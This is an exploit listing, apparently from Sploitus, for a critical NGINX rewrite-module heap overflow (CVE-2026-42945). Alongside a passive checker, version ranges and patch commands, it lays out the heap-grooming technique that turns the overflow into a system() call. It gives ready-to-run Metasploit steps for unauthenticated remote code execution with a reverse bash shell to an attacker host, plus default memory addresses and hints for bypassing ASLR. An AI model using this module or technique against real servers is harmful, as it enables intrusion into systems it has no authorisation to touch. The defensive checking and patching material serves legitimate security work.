## https://sploitus.com/exploit?id=90F0A8EE-51A7-5AC2-8C97-EEBEED5A9E9B
# CVE-2026-42945: NGINX Rift
Critical heap buffer overflow in NGINX's `ngx_http_rewrite_module`, present since **2008** (version 0.6.27).
Allows **unauthenticated RCE** via a specially crafted HTTP request.
> **CVSS:** 9.2 (Critical)
> **Disclosure:** 2026-05-13
> **Actively exploited in the wild** as of 2026-05-16
---
## The Bug
NGINX's rewrite engine uses a two-pass approach: first **calculate** the required buffer size, then **copy** data into it.
The `is_args` flag is set on the main engine when a `rewrite` replacement contains `?`, but the length-calculation pass runs on a freshly zeroed sub-engine:
- **Size pass** → sees `is_args = 0` → returns raw capture length
- **Copy pass** → sees `is_args = 1` → calls `ngx_escape_uri` with `NGX_ESCAPE_ARGS`, expanding each escapable byte to **3 bytes**
The copy overflows the undersized heap buffer with attacker-controlled URI data.
Exploitation uses **cross-request heap feng shui**: POST-body spray requests fill the heap with a fake `ngx_pool_cleanup_s {handler=system(), data=&cmd}`. The crafted GET overflow then overwrites the adjacent `ngx_pool_t` cleanup pointer. When NGINX recycles the pool, `system(cmd)` fires.
---
## Affected Versions
| Product | Affected | Fixed |
|---------|----------|-------|
| NGINX Open Source | 0.6.27 – 1.30.0 | **1.30.1**, **1.31.0** |
| NGINX Plus | R32 – R36 | **R32 P6**, **R35 P2**, **R36 P4** |
---
## Contents
| File | Description |
|------|-------------|
| `check_cve_2026_42945.py` | Passive vulnerability checker (no exploitation, no crash risk) |
| `nginx_rewrite_heap_bof_cve_2026_42945.rb` | Metasploit module with `check` command support |
---
## Checker
Safe, passive check that identifies vulnerable targets without crashing them.
```bash
# Single host
python3 check_cve_2026_42945.py 192.168.1.100
# Custom port and rewrite path
python3 check_cve_2026_42945.py 192.168.1.100 -p 8080 --path /app/
# Scan a list of targets (host:port per line)
python3 check_cve_2026_42945.py -f targets.txt
```
**Check logic:**
| Step | What it checks | Patched indicator |
|------|---------------|-------------------|
| 1 | `Server:` header banner | Not NGINX → skip |
| 2 | Version from banner | `>= 1.30.1` / `1.31.0` → safe |
| 3 | Rewrite probe (301/302 on test URI) | Confirms rewrite rules are active |
| 4 | Overflow-size probe (`349×A + 970×+`) | Patched → `414 URI Too Long`; unpatched → `400`/reset |
**Verdicts:** `LIKELY_VULNERABLE` / `POSSIBLY_VULNERABLE` / `NOT_VULNERABLE` / `UNKNOWN`
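The version-range logic behind step 2 and the Affected Versions table, as an added stand-alone example (not the repository's checker): it classifies an NGINX banner or `nginx -v` line against the ranges stated above. The `R36 P3` style of NGINX Plus release string is an assumed input format for this example.

```python
import re

# Affected ranges as stated in the advisory text above (inclusive).
OSS_FIRST_AFFECTED = (0, 6, 27)
OSS_LAST_AFFECTED = (1, 30, 0)
# NGINX Plus: release -> first patch level that carries the fix.
PLUS_FIXED_PATCH = {32: 6, 35: 2, 36: 4}
PLUS_AFFECTED_RELEASES = range(32, 37)  # R32 .. R36

_OSS_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")
_PLUS_RE = re.compile(r"R(\d+)(?:\s*P(\d+))?", re.IGNORECASE)  # assumed format


def parse_oss_version(banner):
    """Extract (major, minor, patch) from a Server header or 'nginx -v' line.

    Returns None when no version is present (e.g. a bare 'Server: nginx'),
    so callers report UNKNOWN instead of guessing.
    """
    m = _OSS_RE.search(banner)
    return tuple(int(x) for x in m.groups()) if m else None


def is_oss_affected(banner):
    """True if the open-source version is within 0.6.27 .. 1.30.0, False if
    outside it (1.30.1 / 1.31.0 and later are fixed), None if undeterminable."""
    v = parse_oss_version(banner)
    if v is None:
        return None
    return OSS_FIRST_AFFECTED <= v <= OSS_LAST_AFFECTED


def is_plus_affected(release_str):
    """Classify an NGINX Plus release such as 'R36 P3' (constructed format).

    Returns True/False, or None when the string does not look like a release.
    """
    m = _PLUS_RE.search(release_str)
    if not m:
        return None
    release = int(m.group(1))
    patch = int(m.group(2) or 0)          # no 'P' suffix means patch level 0
    if release not in PLUS_AFFECTED_RELEASES:
        return False
    fixed_patch = PLUS_FIXED_PATCH.get(release)
    if fixed_patch is None:               # R33/R34 list no fixed patch level
        return True
    return patch < fixed_patch
```

Distribution packages that backport the fix keep the old upstream version string, so a version-only verdict is a triage hint, not proof; the rewrite probe steps above exist for that reason.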
---
## Metasploit Module
```bash
cp nginx_rewrite_heap_bof_cve_2026_42945.rb ~/.msf4/modules/exploits/multi/http/
```
```
msf6 > reload_all
msf6 > use exploit/multi/http/nginx_rewrite_heap_bof_cve_2026_42945
# Passive check (no exploitation)
msf6 exploit(...) > set RHOSTS 192.168.1.100
msf6 exploit(...) > check
# Full exploit (requires ASLR disabled or known base addresses)
msf6 exploit(...) > set PAYLOAD cmd/unix/reverse_bash
msf6 exploit(...) > set LHOST 192.168.1.10
msf6 exploit(...) > set LPORT 4444
msf6 exploit(...) > run
```
**Options:**
| Option | Default | Description |
|--------|---------|-------------|
| `RHOSTS` | (required) | Target host(s) |
| `RPORT` | `80` | Target port |
| `TARGETURI` | `/api/` | URI with active rewrite rule |
| `SPRAY_URI` | `/spray` | URI for heap spray POST requests |
| `N_SPRAY` | `20` | Number of spray connections |
| `HEAP_BASE` | `0x555555659000` | Heap base (adjust for target) |
| `LIBC_BASE` | `0x7ffff77ba000` | libc base (adjust for target) |
| `SYSTEM_OFFSET` | `0x50d70` | `system()` offset in libc |
> **Note:** Default addresses match Ubuntu 24.04 + NGINX 1.28 + glibc 2.39 with ASLR disabled.
> For ASLR-enabled targets, obtain base addresses via `/proc//maps` or an info-leak.
---
## Patch
Update NGINX immediately:
```bash
# Ubuntu/Debian
apt update && apt install nginx
# RHEL/CentOS
yum update nginx
# Verify
nginx -v # must show >= 1.30.1 or >= 1.31.0
```
---
## References
- [Original PoC: DepthFirstDisclosures/Nginx-Rift](https://github.com/DepthFirstDisclosures/Nginx-Rift)
- [Technical write-up: depthfirst.com](https://depthfirst.com/research/nginx-rift-achieving-nginx-rce-via-an-18-year-old-vulnerability)
- [F5 Security Advisory K000160932](https://my.f5.com/manage/s/article/K000160932)
- [Help Net Security: active exploitation](https://www.helpnetsecurity.com/2026/05/18/ngnix-vulnerability-exploited-cve-2026-42945/)
---
**For authorized security testing and research only.**